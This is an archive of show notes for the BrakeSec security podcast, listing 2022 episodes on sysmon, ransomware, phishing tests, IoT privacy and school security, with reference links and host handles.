Full stream video on Youtube: https://youtu.be/i1xpAfNFCvY
John's Youtube channel, to find more training/contact information: https://www.youtube.com/channel/UC3ctyx980M8jLa_cEiQveLQ
https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration
ADKAR model: https://www.prosci.com/methodology/adkar
CCE framework: https://inl.gov/cce/
Dashboard (non-sponsored link): https://monday.com
Diagrammming tool: https://figma.com
https://www.sciencedirect.com/topics/computer-science/system-analysis
Amazon book: https://www.amazon.com/Engineering-Safer-World-Systems-Thinking/dp/0262533693
Published on: December 11, 2022
Interview with Infrared - one of the Seattle Community Network organizers
https://youtu.be/iW39Mugj4OM -Full stream video (interview starts at 28m22s)
Broadcasted live on Twitch -- Watch live at https://www.twitch.tv/brakesec
Seattle Community Network - https://seattlecommunitynetwork.org/
https://medium.com/seattle-community-network/
Check Bryan out on Mastodon! Mastodon
Published on: November 22, 2022JAMBOREE - an Android App testing platform from @operat0r -part2
introducing @operat0r talked a bit about mobile device hacking and rooting/jailbreaking phones for testing
Grab the powershell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the Youtube videos, including demo! Part2 is here: https://www.youtube.com/watch?v=RXgwUWpRuYA
Published on: November 7, 2022JAMBOREE - an Android App testing platform from @operat0r
introducing @operat0r talked a bit about mobile device hacking and rooting/jailbreaking phones for testing
Grab the powershell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the Youtube videos, including demo! Part 2 will be available soon!
Part 1: https://youtu.be/U5SFav9h1L4
07-oct-news-twitch streaming
https://www.bnbchain.org/en/blog/bnb-chain-ecosystem-update/
https://medium.com/@johnblatt23/uber-hack-reveals-weakness-in-the-human-firewall-8b44a87d43b4
https://securityintelligence.com/articles/what-to-know-honda-key-fob-vulnerability/
https://www.theregister.com/2022/10/07/binance_hack_566m/
https://www.bnbchain.org/en/blog/bnb-chain-ecosystem-update/
https://www.bbc.com/news/business-58193396
https://www.theverge.com/2022/4/18/23030754/beanstalk-cryptocurrency-hack-182-million-dao-voting
https://jpgormally.medium.com/cybersecurity-is-a-successfully-failure-9bcf92a1bc88
https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1
Published on: October 12, 2022
Uber Breach, MFA fatigue, who can help communicate biz risk?
https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell
https://www.zdnet.com/article/uber-security-breach-looks-bad-potentially-compromising-all-systems/
https://twitter.com/RachelTobac/status/1571542949606957057
Twitter:
@boettcherpwned
@infosystir
@brakeSec
@bryanbrake
Twitch: https://twitch.tv/brakesec
Published on: September 19, 2022
Manual Code reviews/analysis, post-infosec Campout discussion
checkout our website: https://www.brakeingsecurity.com
Follow and subscribe with your Amazon Prime account to our Twitch stream: https://twitch.tv/brakesec
Twitter:
@infosystir
@boettcherpwned
@bryanbrake
@brakesec
Find us on all your favorite podcast platforms! Please leave us a 5 star review to help us grow!
Published on: September 2, 2022Amanda's Sysmon Talk -p2
Part 2 of our discussion this week with Amanda, Brian, and Bryan on sysmon, We discuss use cases from her talk, and best ways to get sysmon integrated into your environment.
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
https://www.brakeingsecurity.com
Our #twitch stream can be found at:
Https://twitch.tv/brakesec (subscription is req'd to see full videos)
Amanda's Sysmon Talk -p1
This week Amanda, Brian, and Bryan discuss sysmon, how it works to detect IOCs in your org, and how it extends beyond regular Windows event monitoring.
oh... and it's available for Linux too!
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
https://www.brakeingsecurity.com
Our #twitch stream can be found at:
Https://twitch.tv/brakesec (subscription is req'd to see full videos)
Tanya Janca, Securing APIs, finding Security Champions, and accepting Risk
Tanya Janca, also known as @SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Application Security’. She is also the founder of We Hack Purple, an online learning academy, community and podcast that revolves around teaching everyone to create secure software. Tanya has been coding and working in IT for over twenty years, won countless awards, and has been everywhere from startups to public service to tech giants (Microsoft, Adobe, & Nokia). She has worn many hats; startup founder, pentester, CISO, AppSec Engineer, and software developer. She is an award-winning public speaker, active blogger & streamer and has delivered hundreds of talks and trainings on 6 continents. She values diversity, inclusion, and kindness, which shines through in her countless initiatives.
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
Published on: July 30, 2022
Tanya Janca on secure coding practices, Swagger docs, and why documentation matters
Tanya Janca, also known as @SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Application Security’. She is also the founder of We Hack Purple, an online learning academy, community and podcast that revolves around teaching everyone to create secure software. Tanya has been coding and working in IT for over twenty years, won countless awards, and has been everywhere from startups to public service to tech giants (Microsoft, Adobe, & Nokia). She has worn many hats; startup founder, pentester, CISO, AppSec Engineer, and software developer. She is an award-winning public speaker, active blogger & streamer and has delivered hundreds of talks and trainings on 6 continents. She values diversity, inclusion, and kindness, which shines through in her countless initiatives.
BrakeSec is:
Amanda Berlin @infosystir
Brian Boettcher @boettcherpwned
Bryan Brake @bryanbrake
www.brakeingsecurity.com
Published on: July 24, 2022PYPI enables 2FA, some devs have a problem with this
Full #twitch VOD here (prime sub or paid sub required): https://www.twitch.tv/videos/1528342722
https://github.com/untitaker/python-atomicwrites
https://thehackernews.com/2022/07/pypi-repository-makes-2af-security.html
Twitch streams (175+ hours of content!):
Https://twitch.tv/brakesec
Twitter:
@infosystir
@boettcherpwned
@brakesec
@bryanbrake
Published on: July 14, 2022JW Goerlich on Training, phishing exercises, security metrics,getting the most from user training
JW Goerlich -
“Wolfgang is a cyber security strategist and an active part of the Michigan security community. He co-founded the OWASP Detroit chapter and organizes the annual Converge and BSides Detroit conferences. Wolfgang has held roles such as the Vice President of Consulting, Security Officer, and Vice President of Technology Services. He regularly advises clients on topics ranging from risk management, incident response, business continuity, secure development life cycles, and more.”
RSA talks and discussion
Phishing tests -
https://www.securityweek.com/research-simulated-phishing-tests-make-organizations-less-secure
https://hbr.org/2021/04/phishing-tests-are-necessary-but-they-dont-need-to-be-evil
What are the goal of these tests?
That someone will click and activate (is that not a given?)
What made them popular in the first place?
Is this an example of management not taking security seriously, so we needed proof?
FTA: “This will only undermine the efforts of cybersecurity teams as a whole, alienating the very people they aim to engage with, Barker adds. “People generally don’t like to be tricked, and they don’t usually trust the people who trick them. One counterargument I often hear is that criminals use emotive lures in a phish, so why shouldn’t we? Well, criminals also cause physical damage to property, take systems offline, and disrupt services, but physical social engineers and pen-testers don’t—for good reason. Simulations should not cause active harm.””
Is this part of a larger issue? Why do we treat these tests the way we do?
Typical scenario?
Mgmt does not believe or trust their internal people to tell them what is wrong, and takes a 3rd party source/product to tell them the same thing.
Are these stories Apocryphal? Or just my experience?
Published on: July 5, 2022RSA conference, Zero Trust, SSO, 2FA, and multi-cloud tenancy with J Goerlich
Published on: June 25, 2022jon-dimaggio-part2-threat intel-hacking back-analyzing malware
Author of the #noStarch book "The Art of Cyberwarfare" (https://nostarch.com/art-cyberwarfare)
Topics:
discusses his book,
threat intel as a service,
why people enjoy malware analysis?
Should people 'hack back' and what legal issues are around that?
How do you soften the messaging if you have an insider threat team?
www.infoseccampout.com for more information about our 2022 conference in Seattle, WA on 26-28 August 2022!
Our full 90 minute stream with Jon, including 30 minutes of audio you won't get on the audio podcast is available at the $5 USD Patreon level, or via our VOD at our Twitch Broadcast site (https://twitch.tv/brakesec)
Twitch VOD Link: https://www.twitch.tv/videos/1308277609
Thank you to our Patreon and Twitch supporters for their generous donations and subs and bits!
Published on: June 16, 2022Jon DiMaggio_Art-of-cyberwarfare_hacking_back-insider-threat-messaging_P1
Author of the #noStarch book "The Art of Cyberwarfare" (https://nostarch.com/art-cyberwarfare)
Topics:
discusses his book,
threat intel as a service,
why people enjoy malware analysis?
Should people 'hack back' and what legal issues are around that?
How do you soften the messaging if you have an insider threat team?
www.infoseccampout.com for more information about our 2022 conference in Seattle, WA on 26-28 August 2022!
Our full 90 minute stream with Jon, including 30 minutes of audio you won't get on the audio podcast is available at the $5 USD Patreon level, or via our VOD at our Twitch Broadcast site (https://twitch.tv/brakesec)
Twitch VOD Link: https://www.twitch.tv/videos/1308277609
Thank you to our Patreon and Twitch supporters for their generous donations and subs and bits!
Published on: June 9, 2022news, infosystir's talk at RSA, conti has an 'image' problem
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic
https://portswigger.net/daily-swig/chicago-public-schools-data-breach-blamed-on-ransomware-attack-on-supplier
https://www.helpnetsecurity.com/2022/05/23/protect-kubernetes-cluster/
https://www.darkreading.com/application-security/6-scary-tactics-used-in-mobile-app-attacks
Published on: May 24, 2022
Mieng Lim, Ransomware actions, using insurance to offset risk, good IR/PR comms
Mieng Lim, VP of Product at Digital Defense by HelpSystems
Topic she will discuss:
- Outsmarting RaaS: Strategies to Implement Before, During, and After a Ransomware Attack
https://www.digitaldefense.com/blog/infographic-the-latest-ransomware-facts/
https://www.digitaldefense.com/blog/the-terrifying-truth-about-ransomware/
Prepared questions from Mieng:
- Belief that “malicious actors today are using cutting edge techniques for the majority of attacks”
- Belief that “majority of compromises are via zero-day vulnerabilities”
- Organizations continue to leave systems unpatched with years old vulnerabilities
- Belief that “my organization doesn’t have anything a malicious actor would be interested in…I’m not a target”
- My organization has cyber insurance and that’s enough.
- “I don’t have budget to buy all the products/hire the staff needed to protect my network.”
https://www.techrepublic.com/article/initial-access-brokers-how-are-iabs-related-to-the-rise-in-ransomware-attacks/
https://www.pandasecurity.com/en/mediacenter/security/ransomware-statistics/
As new approaches to ransomware like double extortion continue to pay off, attackers are demanding higher ransom payouts than ever before. The average ransom demand in the first half of 2021 amounted to $5.3 million — a 518% increase compared to 2020. The average ransom payment has also increased by 82% since 2020, reaching a whopping $570,000 in the first half of 2021 alone.
The FBI’s Internet Crime Complaint Center (IC3) received 2,084 ransomware complaints in the first half of 2021. (FBI and CISA)
At least one employee downloaded a malicious mobile application in 46% of organizations in 2021. (Check Point)
@infosystir
@boettcherpwned
@bryanbrake (on Mastodon & Twitter)
@brakeSec
Discord Invite! "please click OK to accept the Code of Conduct in the 'Rules-and-info' channel" https://discord.gg/brakesec
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
Apple Podcasts: https://podcasts.apple.com/us/podcast/brakeing-down-security-podcast/id799131292
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
#Patreon: https://brakesec.com/BDSPatreon
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Mieng-Lim-Ransomware-Best-Practices-p1
Mieng Lim, VP of Product at Digital Defense by HelpSystems
Topic she will discuss:
- Outsmarting RaaS: Strategies to Implement Before, During, and After a Ransomware Attack
https://www.digitaldefense.com/blog/infographic-the-latest-ransomware-facts/
https://www.digitaldefense.com/blog/the-terrifying-truth-about-ransomware/
Prepared questions from Mieng:
- Belief that “malicious actors today are using cutting edge techniques for the majority of attacks”
- Belief that “majority of compromises are via zero-day vulnerabilities”
- Organizations continue to leave systems unpatched with years old vulnerabilities
- Belief that “my organization doesn’t have anything a malicious actor would be interested in…I’m not a target”
- My organization has cyber insurance and that’s enough.
- “I don’t have budget to buy all the products/hire the staff needed to protect my network.”
https://www.techrepublic.com/article/initial-access-brokers-how-are-iabs-related-to-the-rise-in-ransomware-attacks/
https://www.pandasecurity.com/en/mediacenter/security/ransomware-statistics/
As new approaches to ransomware like double extortion continue to pay off, attackers are demanding higher ransom payouts than ever before. The average ransom demand in the first half of 2021 amounted to $5.3 million — a 518% increase compared to 2020. The average ransom payment has also increased by 82% since 2020, reaching a whopping $570,000 in the first half of 2021 alone.
The FBI’s Internet Crime Complaint Center (IC3) received 2,084 ransomware complaints in the first half of 2021. (FBI and CISA)
At least one employee downloaded a malicious mobile application in 46% of organizations in 2021. (Check Point)
@infosystir
@boettcherpwned
@bryanbrake (on Mastodon & Twitter)
@brakeSec
Discord Invite! "please click OK to accept the Code of Conduct in the 'Rules-and-info' channel" https://discord.gg/brakesec
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
Apple Podcasts: https://podcasts.apple.com/us/podcast/brakeing-down-security-podcast/id799131292
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
#Patreon: https://brakesec.com/BDSPatreon
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 11, 2022Mick Douglas on threat intel, customer worries about being hacked, and more
@bettersafetynet
@infosystir
@boettcherpwned
@bryanbrake
@brakeSec
Discord Invite! "please click OK to accept the Code of Conduct in the 'Rules-and-info' channel" https://discord.gg/jhzm4bK9
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
Apple Podcasts: https://podcasts.apple.com/us/podcast/brakeing-down-security-podcast/id799131292
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
#Patreon: https://brakesec.com/BDSPatreon
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 4, 2022news, farmers affected by ransomware, protestware for the 3rd time, trusting opensource
https://www.cyberscoop.com/dhs-bug-bounty-122-vulnerabilities-27-critical-hackers/ https://securityaffairs.co/wordpress/130564/hacking/atlassian-jira-authentication-bypass-issue.html
https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
https://www.coalfire.com/the-coalfire-blog/research-reveals-cyber-risk-is-the-best-language
https://www.cnet.com/tech/mobile/verizon-wireless-customers-report-outages-across-us/
https://www.infosecurity-magazine.com/news/fbi-warns-us-farmers-of-ransomware/
https://securityaffairs.co/wordpress/130497/security/cyber-insurance-global-riskenvironment.html
https://securityaffairs.co/wordpress/130443/hacking/cisco-umbrella-default-ssh-key.html
https://www.helpnetsecurity.com/2022/04/19/open-source-usage-trends/
https://gizmodo.com/cia-nsa-spies-tracked-anomaly-6-product-demo-1848830150
https://www.infosecurity-magazine.com/news/hackers-gain-admin-rights-with/
https://scottbarrykaufman.com/podcast/
Discord invite (must read and heed the Code of Conduct before admittance to the Discord.
https://discord.gg/38eEBYNJ7B (good for 100 invites)
Twitch stream: https://twitch.tv/brakesec
Published on: April 26, 2022
Mick Douglas discusses What2Log, and guidance in light of Okta incident
https://www.brakeingsecurity.com
@bettersafetynet
@infosystir
@boettcherpwned
@bryanbrake
@brakeSec
Published on: April 21, 2022logging analysis, log correlation, and threat analysis dicussion continues - p2
@infosystir on Twitter
@bryanbrake
@boettcherpwned
Amanda and Bryan discusses log analysis, finding, IOCs, and what to do about them.
@infosystir on Twitter
@bryanbrake
@boettcherpwned
Published on: April 5, 2022Shannon Noonan and Stacey Cameron - process automation -p2
Shannon Noonan and Stacey Cameron - QoS Consulting
https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/
https://www.tibco.com/reference-center/what-is-process-automation
https://www.malwarearchaeology.com/cheat-sheets
Published on: March 22, 2022
Shannon Noonan and Stacey Cameron - process automation
https://www.twitch.tv/brakesec
Youtube video (full version): https://www.youtube.com/watch?v=eRwYB22XMNw
Shannon Noonan and Stacey Cameron - QoS Consulting
https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/
https://www.tibco.com/reference-center/what-is-process-automation
https://www.malwarearchaeology.com/cheat-sheets
Published on: March 12, 2022
K12SIX-project-Doug_Levin-Eric_Lankford-threat_intel-edusec-p2
For context, we at the K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our ‘essential protections’ series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections https://www.grf.org/
Global Resilience Federation
We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies.
We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication.
Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% are underneath 2,500 students
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence l GMA
There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here’s how they break down:
- All: 130,930
- Elementary schools: 87,498
- Secondary schools: 26,727
- Combined schools: 15,804
- Other: 901
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the isac help?
How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks?
Someone listening might say “hey, I’d love to help…” what/if any opportunities can the larger infosec community do to help your org?
Published on: March 1, 2022K12SIX's Eric Lankford and Doug Levin on helping schools get added security -p1
The K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our ‘essential protections’ series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections
Global Resilience Federation
We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies.
We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication.
Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense.
https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619
https://edscoop.com/texas-school-paid-547k-ransomware-jam/
https://statescoop.com/ransomware-allen-texas-school-district-email-parents/
https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education
https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html
2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf
85-89% of school systems have 2,500 students or fewer
Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01
https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence
There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here’s how they break down:
- All: 130,930
- Elementary schools: 87,498
- Secondary schools: 26,727
- Combined schools: 15,804
- Other: 901
What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the isac help?
How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks?
Someone listening might say “hey, I’d love to help…” what/if any opportunities can the larger infosec community do to help your org?
April Wright and Alyssa Miller - IoT platforms, privacy and security, embracing standards
Alyssa Milller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
- Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
- IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
- Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
- Threat modeling, vulnerabilities in IoT networks and platforms
Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh
Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: February 15, 2022
Alyssa Miller, April Wright, on IoT Privacy & Security, using tech for stalking, what could be done? Part1
Alyssa Milller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
Talk about side projects, podcasts, speaking events, etc (if you want to)
- Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
“For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems,” said Kent Walker, chief legal officer at Google in a blog post published after the meeting. “But in fact, while some projects do have many eyes on them, others have few or none at all.”
Show was inspired by this Twitter conversation:
https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19
https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19
- IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/)
Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/
Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways
Gateways -
Devices -
Mobile apps -
SDKs -
integrations
Cloud services DO go offline, point of failure:
https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/
Connectivity and sharing mesh networks assumes you like your neighbors.
Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf
network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/
- Stalking/privacy vs. tracking/surveillance
Fine GPS locations
Nearby devices triangulate (via BLE, wifi, or 900mhz)
We want to find our lost devices, but devices can be used for stalking
Just have an iPhone and you’ll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone)
What do companies want with that information?
What is a ‘happy medium’ to allow you to find your dog, but not to track people?
Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification (“Hi, I am a lost device…”)
Is what Airtags doing enough to reduce the fear?
Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile)
How often do you lose your keys? Why is your dog not on a leash or properly trained?
What will it take to make these kinds of devices more secure?
https://spectrum.ieee.org/why-iot-sensors-need-standards
Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified?
Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf
https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs
- Threat modeling, vulnerabilities in IoT networks and platforms
Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/
https://www.avsystem.com/blog/iot-ecosystem/
Old and outdated libraries, like TCP vulnerabilities (RIPPLE20)
https://www.businessinsider.com/iot-security-privacy
https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/
https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh
Networks: A Survey
https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/
https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK
Opt-out of Amazon sidewalk
Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure
Fetch:
As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet’s collar and help ensure they’re safe. If your dog wanders outside a perimeter you’ve set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-time location information, helping you quickly reunite with your lost pet. For device makers, Fetch also serves as a reference design to demonstrate the potential that devices connected to a broad, reliable network can provide to their customers.
https://www.aboutamazon.com/news/devices/introducing-amazon-sidewalk
Published on: February 7, 2022
Bit of news, Belarus train system hack, VMware Horizon vulns, edge network device vulns
News articles we covered this week:
https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/
https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/
https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/
Whimmery's Walkthroughs: Join @whimmery on her twitch or on the @brakesec Youtube channel for walkthroughs on Burp Suite training and more!
Twitter handles:
Official Podcast: @brakesec
Brian Boettcher: @boettcherpwned
Amanda Berlin: @infosystir @hackersHealth @infosecroleplay
Bryan Brake: @bryanbrake
Published on: February 1, 2022
April Wright and Alyssa Miller- Open Source sustainabilty
Alyssa Milller (@AlyssaM_InfoSec)
April Wright (@Aprilwright)
0. Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.)
Log4j and OSS software management and profitability
Free as in beer, but you pay for the cup… (license costs $$, not the software).
“If you make money using our software, you must buy a license” - not an end-user license
Open source conference at Whitehouse:
https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/
https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406
